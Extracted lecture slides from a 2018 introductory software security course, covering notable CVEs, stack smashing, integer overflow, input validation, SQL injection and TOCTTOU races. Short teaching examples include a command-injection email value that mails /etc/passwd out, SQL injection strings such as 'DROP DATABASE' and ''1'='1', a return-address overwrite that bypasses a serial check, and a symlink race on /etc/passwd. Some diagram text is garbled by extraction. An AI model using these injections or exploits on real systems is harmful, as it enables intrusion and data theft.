introduction to software security software...

Seong-je Cho

Spring 2018

Computer Security & Operating Systems Lab, DKU

Introduction to Software Security

Software Flaws(chapter 11)

- 2 -

Sources / References

Textbook

N. Vlajic, CSE 3482: Introduction to Computer Security, Yorku

Nicholas Weaver, Computer Science 161: Computer Security, Berkeley

Myrto Arapinis, Computer Security: INFRA10067, University of Edinburgh

2011 CWE/SANS Top 25 Most Dangerous Software Errors

Lecture 12 Program Security, CS 450/650 Lecture

Please do not duplicate and distribute

Computer Security & OS Lab, DKU

- 3 -

Contents

Software Security Issues

The 10 Worst Vulnerabilities of the last 10 years – Dark Reading

Software Bug/Flaw/Vulnerability

Buffer Overflows

Stack Buffer Overflows = Stack Smashing

Integer Overflows

Incomplete Mediation

Race Conditions, Format String Bugs


- 4 -

Why Software?

Why is software as important to security as crypto, access control and protocols? Virtually all of information security is implemented in software

If your software is subject to attack, your security is broken Regardless of strength of crypto, access control or protocols

Software is a poor foundation for security

Software Flaws = Software Vulnerability

Software Weakness


- 5 -

Bad Software

Bad software is everywhere! NASA Mars Lander (cost $165 million)

Crashed into Mars

Error in converting English and metric units of measure

Denver airport (in 1994)

Buggy baggage handling system

Delayed airport opening by 11 months

Cost of delay exceeded $1 million/day

MV-22 Osprey: Advanced military aircraft

Lives have been lost due to faulty software


- 6 -

SW bugs can prove deadly

Gamers May Fight Deadly Software Bugs in US Military Weapons [Jan. 23 2012, Technews]

a lesson learned when a buggy Patriot missile defense system failed to intercept a Scud missile that killed 28 American soldiers during the first Gulf War in 1991.

To prevent such weapons disasters, the U.S. military wants to transform dull bug-hunting tasks into fun problem-solving games that attract swarms of online players

Bug can cause deadly failures when anesthesia device is connected to cell phones [Apr. 23 2014, ars-technica]

Federal safety officials have issued an urgent warning about software defects in an anesthesia delivery system that can cause life-threatening failures at unexpected times, including when a cellphone or other device is plugged into one of its USB ports.

Spacelabs Healthcare is recalling the ARKON Anesthesia System with Version 2.0 Software due to a software defect.

anesthesia: 마취, 무감각증,


The 10 Worst Vulnerabilities of The Last 10 Years

(Dark Reading, 5/6/2016)

See also “The 5 Most Dangerous Software Bugs of 2014”


- 8 -

OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

The Heartbleed Bug in the OpenSSL cryptographic library exposedSSL-based websites and software to attacks that would have allowed information theft on an unprecedented scale.

Nearly one-third of all major websites were believed vulnerable to the issue when Heartbleed was first disclosed in April 2014.

Because the vulnerability existed in the SSL/TLS encryption that websites and software use to protect information, the bug gave attackers an opportunity to eavesdrop on Web traffic, spoof users and servers and steal data directly from them.


https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160

http://heartbleed.com/

http://www.darkreading.com/vulnerabilities---threats/emergency-ssl-tls-patching-under-way/d/d-id/1204282

http://www.darkreading.com/informationweek-home/more-than-a-half-million-servers-exposed-to-heartbleed-flaw/d/d-id/1204318

- 9 -

Shellshock (CVE-2014-6271)

GNU Bash Remote Code Execution Vulnerability

Shellshock affected most versions of Unix, Linux and Mac OS X and allowed attackers to execute malicious code on vulnerable systems.

Some analysts estimated that nearly half a billion Internet connected devices and web servers were vulnerable to the issue at the time the bug was disclosed, including web servers, Android devices, OpenBSD, DHCP clients, SSH servers and Mac OSX devices.


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

- 10 -

Stagefright Vulnerabilities: CVE-2015-1538,CVE-2015-1539,CVE-2015-3824

multiple remotely executable vulnerabilities in Android’s Stagefrightmultimedia framework library pushed Google into instituting a monthly patch release process for Android and put pressure on other handset makers to do the same.

The flaws, in a core Android component that handles all video and audio files and provides playback facilities, affected all versions of Android going back to Froyo and impacted nearly a billion Android devices.

Stagefright basically gave attackers armed with only a victims’ phone number, a way to use specially crafted MMS messages to execute malicious code on vulnerable devices.

The vulnerabilities did not require the victim to take any action in order in order for malicious code to be executed on their devices.

The flaws have been described as by far the worse ever to hit Android to date.

Google has patched dozens of vulnerabilities in the media-sever component since Zimperium’s original vulnerability disclosure.


http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1538



http://www.darkreading.com/vulnerabilities---threats/stagefright-android-bug-heartbleed-for-mobile-but-harder-to-patch/d/d-id/1321477

http://www.darkreading.com/vulnerabilities---threats/stagefright-20-vuln-affects-nearly-all-android-devices-/d/d-id/1322446

- 11 -

SSL 3.0 Protocol Vulnerability and POODLE Attack (CVE-2014-3566)

The SSL 3.0 Protocol Vulnerability and associated Padded Oracle on Downgraded Legacy Encryption (POODLE) exploit of 2014 stemmed from an implementation weakness in the SSL 3.0 protocol related to the encryption of whole data blocks.

The weakness gives attackers a way to break encrypted communications between a Web server and client browser and to steal authentication cookies and other data.

The POODLE attack basically demonstrated how threat actors could take advantage of a backwards-compatibility feature built into SSL/TSL to force browsers and web servers to use the vulnerable SSL 3.0 protocol and thereby break encrypted communications.

While SSL 3.0 is an old encryption standard and has generally been replaced by TLS, most SSL/TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.



http://www.darkreading.com/attacks-breaches/poodle-attacks-kills-off-ssl-30/d/d-id/1316663

- 12 -

Remote Code Execution Vulnerability in MS Server Service (CVE-2008-4250)

This buffer overflow vulnerability in the Server Service in multiple versions of Windows including Windows 2000 SP4, XP SP2 and SP3 and Server 2008 gave attackers a way to remotely execute malicious code on vulnerable systems using specially crafted remote procedure call.

What made the flaw dangerous was the fact that attackers could run arbitrary code on vulnerable systems without any authentication.


http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4250

http://www.darkreading.com/risk/waiting-on-a-worm/d/d-id/1129800?print=yes

- 13 -

glibc: getaddrinfo stack-based buffer overflow (CVE-2015-7547)

Earlier this year, security researchers at Google and Red Hat disclosed a critical buffer overflow vulnerability in the GNU C Library (glibc) used by all major Linux distributions.

The flaw existed in a DNS client-side resolver in glibc, and was exploitable through the use of a particular function called getaddrinfo().

It allowed attackers to use DNS servers or domains in their control to essentially takeover systems and applications running the flawed software.

All major Linux distributions and the glibc project have issued patches for the problem.



https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html

https://access.redhat.com/articles/2161461

- 14 -

Bad USB

Its implications are broad and scary all the same considering the ubiquitous use of USBs, according to researchers from Germany-based Security Research Labs who first raised the issue in a Black Hat presentation in 2014.

The researchers showed how it is possible for attackers to convert a benign USB device into a malicious one by quietly reprogramming its controller chip through a firmware update.

According to the researchers, widely used USB controller chips, such as those used in thumb drivers are not protected against such modification.

Reprogrammed USB devices can be used to surreptitiously carry out a slew of malicious tasks including stealing data and files, installing malware, redirecting traffic and infecting other USB devices.


https://srlabs.de/blog/wp-content/uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf

http://www.darkreading.com/endpoint/when-good-usb-devices-go-bad/d/d-id/1297876

Software Security Issues(Software Bugs)


- 16 -

Threats of Insecure Software

Successful exploitation of insecure software can lead to data breach and information leakage (confidentiality exposure), modification or alteration of data (integrity exposure) and/or defacement, downtime, and denial of service (availability exposure), besides financial loss.

Undetected and surreptitious exploitation can also lead to implantation of malicious software (Malware) within your organization, giving the malicious attacker both the ability and potential to attack any time, even perpetually.

Surreptitious: 은밀한, 슬쩍하는

Perpetually: 영구히, 영속적으로


- 17 -

Software Issues

“Normal” users Find bugs and flaws by accident

Hate bad software…

… but must learn to live with it

Must make bad software work


Attackers Actively look for bugs and flaws

Like bad software…

… and try to make it misbehave

Attack systems thru bad software

- 18 -

Complexity

“Complexity is the enemy of security”, Paul Kocher, Cryptography Research, Inc.


A new car contains more LOC than was required to land the Apollo astronauts on the moon

Netscape 17,000,000

Space shuttle 10,000,000

Linux 1,500,000

Windows XP 40,000,000

Boeing 777 7,000,000

System Lines of code (LOC)

- 19 -

Lines of Code and Bugs

Conservative estimate: 5 bugs/1000 LOC

Do the math Typical computer: 3,000 exe’s of 10K each

Conservative estimate of 50 bugs/exe

About 3K X 50 = 150K bugs per computer

30,000 node network has 4.5 billion bugs

Suppose that only 10% of bugs security-critical and only 10% of those remotely exploitable

Then “only” 45 million critical security flaws!


- 20 -

Software Security Topics

Program flaws (unintentional)

Buffer overflow

Incomplete mediation

Race conditions

Malicious software (intentional)

Viruses

Worms

Other breeds of malware


- 21 -

Program Flaws

An error오류 is a programming mistake To err is human

An error may lead to incorrect state: fault결점

A fault is internal to the program

A fault may lead to a failure실패, where a system departs from its expected behavior A failure is externally observable


Error Fault Failure

- 22 -

Example

This program has an error

This error might cause a fault

Incorrect internal state

If a fault occurs, it might lead to a failure

Program behaves incorrectly (external)

We use the term flaw결함 for all of the above


char array[10];

for(i = 0; i < 10; ++i)

array[i] = `A`;

array[10] = `B`;

- 23 -

Program Flaws

Program flaws are unintentional But still create security risks

We’ll consider 3~4 types of flaws Buffer overflow (smashing the stack)

Integer overflow


Race conditions (?)

Many other flaws can occur

These are most common


- 24 -

Secure Software

In software engineering, try to insure that a program does what is intended

Secure software engineering requires that the software does what is intended… …and nothing more

Absolutely secure software is impossible

Absolute security is almost never possible!

How can we manage the risks?


Buffer Overflow (BoF)


- 26 -

Example Vulnerable C Program


#define MAX_LEN 10

int unsafe ( char *a, char *b ) {

char t[MAX_LEN];

strcpy (t, a);

strcat (t, b);

return strcmp (t, “abc”);

}

unsafe(“123”, “abc”);

unsafe(“1234567”, “890abcdef”);

- 27 -

An Unsafe Program


#include <limits.h>

int i;

unsigned int j;

i = INT_MAX; // 2,147,483,647

i++;

printf (“i = %d \n”, i);

j = UNIT_MAX; // 4,294,967,295

j++;

printf (“j = %u \n”);i = -2,147,483,648

j = 0

- 28 -

Another Example


- 29 -

1988: Morris Internet Worm

fingerd.c:

char line[512];

…

line[0] = ’\0’;

gets(line);

Results in 6,000 computers being infected.

Fingerd bug fix

memset(line,0,sizeof(line));

fgets(line,sizeof(line),stdin);


- 30 -

String Null Termination Errors #1


1. int main (int argc, char *argv[]) {

2. char cmdline [4096];

3. cmdline[0] = ‘\0’; // 없다면 ??

4.

5. for (int i = 1; i < argc; ++i) {

6. strcat (cmdline, argv [i]);

7. strcat (cmdline, “ ”);

8. }

9. /* … */

10. return 0;

11. }

30Computer security & OS lab, DKU

strcat – append a string to another

ptr = strcat (s1, s2);

• Both strings “s1” and “s2” must be terminated by the usual ‘\0’ character.

- 31 -

String Null Termination Errors #2


1 char ∗string_data ;

2 char a[16] ;

3 /∗ . . . ∗/

4 strncpy (a , string_data, sizeof( a ) ) ;

How many problems are there?

If string_data is NULL, …

If the length of string_data is greater than the size of a, …

- 32 -

Null-Termination Errors

Another common problem with C-style strings is a failure to properly null terminate

int main(int argc, char* argv[]) {

char a[16];

char b[16];

char c[32];

strncpy(a, "0123456789abcdef", sizeof(a));

strncpy(b, "0123456789abcdef", sizeof(b));

strncpy(c, a, sizeof(c));

}


Neither a[] nor b[] are properly terminated

- 33 -

Passing Strings to Complex Subsystems

Improper Data Sanitization

● An application inputs an email address from a user and writes the address to a buffer [Viega 03]

1. sprintf (buffer, “/bin/mail %s < /tmp/email”, addr);

2. system (buffer);

Normal input: [email protected]

What if: [email protected]; cat /etc/passwd | mail [email protected]

[Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.


mailto:[email protected]

mailto:[email protected]

- 34 -

Typical Attack Scenario

1. Users enter data into a Web form

2. Web form is sent to server

3. Server writes data to buffer, without checking length of input data

4. Data overflows from buffer

Sometimes, overflow can enable an attack

Web form attack could be carried out by anyone with an Internet connection


- 35 -

Buffer Overflow

Q: What happens when this is executed?

A: Depending on what resides in memory at location “buffer[20]” and “buffer[30]”

Might overwrite user data or code

Might overwrite system data or code


int main(){

int arr[10];

int buffer[10];

buffer[20] = 37;

buffer[30] = 58;}

- 36 -

Simple Buffer Overflow

Consider boolean flag for authentication

Buffer overflow could overwrite flag allowing anyone to authenticate!


In some cases, attacker need not be so lucky as to have overflow overwrite flag

buffer

FF O U R S C …

Boolean flag

- 37 -

Simple Buffer Overflow

Consider boolean flag for authentication

Buffer overflow could overwrite flag allowing anyone to authenticate!


In some cases, attacker need not be so lucky as to have overflow overwrite flag

buffer

FTF O U R S C …

Boolean flag

- 38 -

Memory Organization

Text == code

Data == static variables

Heap == dynamic data

Stack == “scratch paper” Dynamic local variables

Parameters to functions

Return address


stack

heap

data

text

high address

low address

SP

Simplified Stack Example

Chapter 11 Software flaws and malware

high

void func(int a,

int b){

char buffer[10];

}

void main(){

func(1, 2);

}

::

low

3



high

void func(int a,

int b){

char buffer[10];

}

void main(){

func(1, 2);

}

::

buffer

ret

a

b

low

SP

SP

SP

SP

3



high

void func(int a,

int b){

char buffer[10];

}

void main(){

func(1, 2);

}

::

buffer

ret

a

b

returnaddress

low

3

Smashing the Stack


high

What happens if buffer overflows?

::

buffer

a

b

low

ret

3

SP

SP

SP

SP

Smashing the Stack


high


::

buffer

b

low

3

SP

SP

SP

SP

overflow

overflow

Smashing the Stack


high


::

buffer

b

ret…

low

Program “returns” to wrong location

NOT!

???

A crash is likely

3

overflow

overflow

Stack Smashing Example

Program asks for a serial number that the attacker does not know

Attacker also does not have source code Attacker does have the executable (exe)


Program quits on incorrect serial number

45


By trial and error, attacker discovers an apparent buffer overflow


Note that 0x41is “A”

Looks like retoverwritten by 2 bytes!

46


Next, disassemble bo.exe to find


The goal is to exploit buffer overflow to jump to address 0x401034

47


Find that 0x401034 is “@^P4” in ASCII


Byte order is reversed? Why?

X86 processors are “little-endian”

48


Reverse the byte order to “4^P@” and…


Success! We’ve bypassed serial number check by exploiting a buffer overflow

Overwrote the return address on the stack

49


Attacker did not require access to the source code

Only tool used was a disassembler to determine address to jump to Can find address by trial and error

Necessary if attacker does not have exe

For example, a remote attack

Chapter 11 Software flaws and malware 50


Source code of the buffer overflow


Flaw easily found by attacker

Even without the source code!

51

- 52 -

Stack Smashing Prevention

1st choice: employ non-executable stack“No execute” NX bit (if available)

Seems like the logical thing to do, but some real code executes on the stack! (Java does this)

2nd choice: use safe languages (Java, C#)

3rd choice: use safer C functionsFor unsafe functions, there are safer versions

For example, strncpy / strlcpy instead of strcpy


- 53 -

Example Vulnerable C Program Fix


#define MAX_LEN 10

int unsafe ( char *a, char *b ) {

char t[MAX_LEN];

strcpy (t, a);

strcat (t, b);

return strcmp (t, “abc”);

}

unsafe(“1234567”, “890abcdef”);

Integer Overflow


- 55 -

Integer Overflow Examples

Example 1

#include <stdio.h>

int main(void){

unsigned int num = 0xffffffff;

printf("num = %u (0x%x)\n", num, num);

printf("num + 1 = 0x%x\n", num + 1);

return 0;

}

/* EOF */

The output of this program looks

like this:

num = 4294967295 (0xffffffff)

num + 1 = 0x0

Example 2

#include <stdio.h>

int main(void){

int n;

n = 0x7fffffff;

printf(“n = %d (0x%x)\n", n, n);

printf(“n + 1 = %d (0x%x)\n", n + 1 , n+1);

return 0;

}

/* EOF */

The output of which is:

n = 2147483647 (0x7fffffff)

n + 1 = -2147483648 (0x80000000)

- 56 -

Integer Overflow Errors: Addition/Subtraction/Multiplication


1. unsigned int ui1, ui2 , usum ;

2.

3. /∗ Initialize ui1 and ui2 ∗/

4.

5. usum = ui1 + ui2 ;

UINT_MAX = ?

INT_MAX = ?

INT_MIN = ?

sizeof (signed int) = ?

1. signed int si1 , si2 , result;

2.

3. /∗ Initialize si1 and si2 ∗/

4.

5. result = si1 * si2 ;

1. signed int si1, si2, result;

2.

3. /* initialize si1 and si2 */

4.

5. result = si1 – si2;

- 57 -

Integer Ranges

Example integer ranges


- 58 -

Integer Overflow


- 59 -

Integer Underflow


- 60 -

Integer overflow

The size of int is depending on the architecture.● So on i386 arch (32-bit) the int is 32-bits

● if this value can be controlled and a value is submitted that is larger in size than 32 bits we will successfully overflow memory.

So according in C the maximum size of a signed int is INT_MAX = 2147483647,

The maximum size of an unsigned int is UINT_MAX = 4294967295 (0xffffffff),

if a value is larger than the INT_MAX is used it will trigger a segmentation fault.


- 61 -

Integer underflow

if the integer value used is less than the minimum signed or unsigned int.

This is called an underflow and will also trigger a segmentation fault.

Because the binary unsigned int -4294967295 is similar to the binary representation of the signed int -1 in memory INT_MIN = -2147483647-1 UINT_MIN = -4294967295


Secure Coding

Fun with Integers

char x, y;

x = -128;

y = -x;

if (x == y) puts("1");

if ((x - y) == 0) puts("2");

if ((x + y) == 2 * x) puts("3");

if (((char)(-x) + x) != 0) puts("4");

if (x != -y) puts("5");


Secure Coding

Type Conversion

Implicit Conversions


- 65 -


Failure to perform “sanity checks” on data can lead to random or carefully planned flaws.

Examples:

Impossible dates in correct format (say yyyyMMMdd):

1800Feb30, 2048Min32

What happens when these dates are looked up in tables in the program?

Alterable parameter fields in URL:

http://www.things.com/order/final&custID=101&part=555A&qy=20&pric

e=10&ship=boat&total=205

Web site adds parameters incrementally as transaction proceeds. User can change them

inconsistently.


- 66 -


Inputs to programs are often specified by untrusted users

Web-based applications are a common example

Users sometimes mistype data in forms

Phone number: 51998884567

Email: iang#cs.uwaterloo.ca

An application needs to ensure that what user has entered constitutes a meaningful request

This is called mediation

Incomplete mediation occurs when the application accepts incorrect data from user

Sometimes this is hard to avoid

Phone number: 519-886-4567

This is a reasonable entry, that happens to be wrong


- 67 -


We focus on catching entries that are clearly wrong

Not well formed

DOB: 1980-04-31

Unreasonable values

DOB: 1876-10-12

Inconsistent with other entries

Why do we care?

What happens if someone fills in:

DOB: 98764874236492483649247836489236492

» Buffer overflow?

DOB: '; DROP DATABASE clients --

» SQL injection?

We need to make sure that any user-supplied input falls within well-specified values

known to be safe


- 68 -


Sensitive data are in exposed, uncontrolled condition

Unchecked data are a serious vulnerability!

Possible scenarios

Supplying the wrong type of data being requested.

Supplying the wrong length of data being requested.

In a system, a user is allowed to edit input directly

In a system, a server does not check validity of data values received from client

In a system, a client returns a sensitive result (like total) that can be easily recomputed by server

Problems

System fails

Supply of Bad Data

Must be checked by programmer

Client side verses Server Side


- 69 -

Input Validation

Consider: strcpy(buffer, argv[1])

A buffer overflow occurs if

len(buffer) < len(argv[1])

Software must validate the input by checking the length of argv[1]

Failure to do so is an example of a more general problem: incomplete mediation 불완전중재


- 70 -

Input Validation

Consider web form data URL to be generated by client’s browser to access server.

GET and POST requests (Which is more secure?)

Suppose input is validated on client

For example, the following is validhttp://www.things.com/orders/final&custID=112&num=55A&qty=2

0&price=10&shipping=5&total=205

Suppose input is not checked on server Why bother since input checked on client?

Then attacker could send http messagehttp://www.things.com/orders/final&custID=112&num=55A&qty=2

0&price=10&shipping=5&total=25

User uses forged URL to access server


- 71 -


Linux kernel

Research has revealed many buffer overflows

Many of these are due to incomplete mediation

Linux kernel is “good” software since

Open-source

Kernel written by coding gurus

Tools exist to help find such problems

But incomplete mediation errors can be subtle

And tools useful to attackers too!


- 72 -

Incomplete Mediation (ex. SQL Injection)

John Fiore

SELECT * from CUSTOMERS

WHERE name = 'John Fiore'

- 73 -

Incomplete Mediation (ex. SQL Injection)

John Fiore' or '1'='1

SELECT * from CUSTOMERS

WHERE name = 'John Fiore'

OR '1'='1'

- 74 -

Client-side mediation

forms that do client-side mediation

When you click “submit”, Javascript code will first run validation checks on the data you entered

If you enter invalid data, a popup will prevent you from submitting it

Related issue: client-side state

Many web sites rely on the client to keep state for them

Put hidden fields in the form which are passed back to the server when user submits the form

Problem: what if the user

Turns off Javascript?

Edits the form before submitting it?

Writes a script that interacts with the web server instead of using a web browser at all?

Connects to the server “manually”?

telnet server.com 80

Note that the user can send arbitrary (unmediated) values to the server this way

The user can also modify any client-side state


- 75 -

Defenses

Client-side mediation is an OK method to use in order to have a friendlier user interface

but is useless for security purposes.

You have to do server-side mediation

whether or not you also do client-side

For values entered by the user

Always do very careful checks on the values of all fields

These values can potentially contain completely arbitrary 8-bit data and be of any length

For state stored by the client:

Make sure the client has not modified the data in any way


Race Conditions(Time-of-Check to Time-of-Use Errors)


- 77 -

Race Condition

Security processes should be atomic

Occur “all at once”

Race conditions can arise when security-critical process occurs in stages Race Condition errors are also known as TOCTTOU (“TOCK-too”) errors

Attacker makes change between stages

Often, between stage that gives authorization, but before stage that transfers ownership

Example: Unix mkdir


mkdir Race Condition


mkdir creates new directory How mkdir is supposed to work

1. Allocatespace

mkdir

2. Transferownership

78

mkdir Attack


Not really a “race” But attacker’s timing is critical

1. Allocatespace

mkdir

3. Transferownership

2. Create link topassword file

The mkdir race condition

79

- 80 -

Race Conditions

Race conditions are common

Race conditions may be more prevalent than buffer overflows

But race conditions harder to exploit

Buffer overflow is “low hanging fruit” today

To prevent race conditions, make security-critical processes atomic

Occur all at once, not in stages

Not always easy to accomplish in practice


- 81 -

Time-of-check to Time-of-use (TOCTTU)

A delay between checking permission to perform certain operations and using this permission may enable the operations to be changed.

Example:

1) User attempts to write 100 bytes at end of file “abc”.

Description of operation is stored in a data structure.

2) OS checks user’s permissions on copy of data structure.

3) While user’s permissions are being checked, user changes data structure to describe operation to delete file “xyz” .

Can you find further examples?


- 82 -

Summary, Q & A

Software bug

Software vulnerability

Software security vs. Software quality

Type conversion errors

Null pointer errors

Integer overflow/underflow

Format string bugs http://null-byte.wonderhowto.com/how-to/security-oriented-c-tutorial-0x14-format-string-vulnerability-part-i-buffer-

overflows-nasty-little-brother-0167254/


• What types of threat are related to this lecture?‒ Consider the STRIDE model !

http://null-byte.wonderhowto.com/how-to/security-oriented-c-tutorial-0x14-format-string-vulnerability-part-i-buffer-overflows-nasty-little-brother-0167254/

- 83 -

Race Conditions: Example

• setuid allocates terminals to users

– a privileged operation

– supports writing contents of terminal to a log file

• first checks if the user has permissions to write to the requested file; if so, it opens the file for writing

• The attacker makes a symbolic link:

logfile -> file_he_owns

• Between the “check” and the “open”, he changes it:

logfile -> /etc/passwd


- 84 -

Race Conditions: The problem

• State of the system changed between the check for permission and the execution of operation

• File whose permissions were checked for writeability by the user (file_he_owns) wasn't the same file that was later written to (/etc/passwd)

– Even though they had the same name (logfile) at different points in time


introduction to software security software...

Documents